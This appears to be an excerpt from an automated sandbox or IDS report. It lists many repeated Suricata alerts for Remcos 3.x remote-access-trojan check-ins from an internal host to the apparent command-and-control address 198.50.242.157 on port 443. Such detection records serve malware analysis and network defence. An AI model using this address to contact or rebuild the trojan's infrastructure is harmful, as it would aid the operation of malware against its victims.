                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49924 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49956 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50018 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49955 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49925 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49989 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49971 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50057 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50058 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49948 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49979 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49970 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50065 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50063 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50068 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49987 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49864 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49936 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50028 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50042 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49947 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49916 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50084 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50088 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49977 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50080 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50052 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49985 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50002 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50032 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50040 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50004 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50066 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50100 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50010 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49941 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50017 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50000 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50054 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50003 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50083 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50117 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49950 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50070 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50140 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50060 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49966 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50020 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49988 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50099 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50021 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50038 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50067 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50061 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50145 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50124 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50051 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49900 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50085 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50077 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50013 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50126 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50127 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50082 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50036 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50134 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50014 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49961 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50133 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50023 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50072 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50138 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50107 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50113 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49974 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50071 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50050 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50079 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50153 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49963 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50183 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50115 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50108 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49931 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50122 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49972 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50090 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50168 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50196 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50044 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50155 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50142 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49958 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49921 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50199 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49991 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50202 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50185 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50147 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50114 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50093 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50019 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50081 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49980 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50201 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50203 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50152 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50030 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50151 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50043 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50111 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50026 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50220 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49976 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50187 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50112 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49984 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50039 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50225 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50128 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50176 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50191 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50095 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50116 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49983 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50235 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50148 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50005 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49887 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50160 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50118 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50045 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50173 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50012 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50230 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50219 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50139 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49917 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50212 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50237 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50076 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50056 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50181 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50029 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49816 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50200 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50120 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50211 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50269 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50274 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50273 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50270 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50228 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50150 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50087 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50297 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50166 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50075 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50195 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49940 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50189 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50262 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49851 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50215 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50164 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50251 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50242 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49954 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50263 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50103 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50192 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50110 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50178 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50254 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50319 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50252 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50280 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49981 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50184 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50136 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50304 -> 198.50.242.157:443
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50331 -> 198.50.242.157:443
